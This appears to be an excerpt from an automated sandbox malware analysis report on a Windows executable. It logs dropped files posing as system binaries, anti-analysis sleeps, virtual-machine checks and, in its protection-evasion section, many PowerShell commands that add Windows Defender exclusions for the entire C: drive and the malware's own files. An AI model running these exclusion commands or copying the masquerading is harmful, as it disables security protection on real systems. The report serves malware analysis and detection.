                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1806
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1288
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1921
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1392
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2047
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 927
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1365
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1366
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1735
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1332
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1744
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1897
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1715
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1535
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1403
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1525
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HnmxfGsC.log
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ynMPgItS.log
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe Dropped PE file which has not been started: C:\Users\user\Desktop\yEThvdnU.log
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fsrbbHSF.log
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WJYLrfNX.log
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MaEvHCHq.log
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe Dropped PE file which has not been started: C:\Users\user\Desktop\oWARLBim.log
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe TID: 2120 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe TID: 7188 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe TID: 7736 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe TID: 7732 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8364 Thread sleep count: 1792 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9192 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9000 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8428 Thread sleep count: 1120 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9204 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8928 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8432 Thread sleep count: 1806 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4016 Thread sleep time: -11990383647911201s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8268 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8660 Thread sleep count: 1288 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9200 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8984 Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8668 Thread sleep count: 1921 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1316 Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8496 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8376 Thread sleep count: 1392 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9196 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8956 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8604 Thread sleep count: 2047 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9176 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8964 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8640 Thread sleep count: 927 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3824 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5684 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8804 Thread sleep count: 1365 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2856 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9208 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8716 Thread sleep count: 1366 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8940 Thread sleep time: -18446744073709540s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5984 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8728 Thread sleep count: 1735 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6184 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9164 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8464 Thread sleep count: 1332 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 608 Thread sleep time: -11068046444225724s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8636Thread sleep count: 1744 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1252Thread sleep time: -7378697629483816s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9180Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368Thread sleep count: 1897 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9036Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8724Thread sleep count: 1715 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2516Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8248Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8672Thread sleep count: 1535 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9188Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8992Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8864Thread sleep count: 1403 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3088Thread sleep time: -11990383647911201s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8612Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8664Thread sleep count: 1525 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6836Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1660Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe TID: 1748Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe TID: 6844Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1620188140.000000001C209000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: w32tm.exe, 0000004F.00000002.1535058192.0000014BC58C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
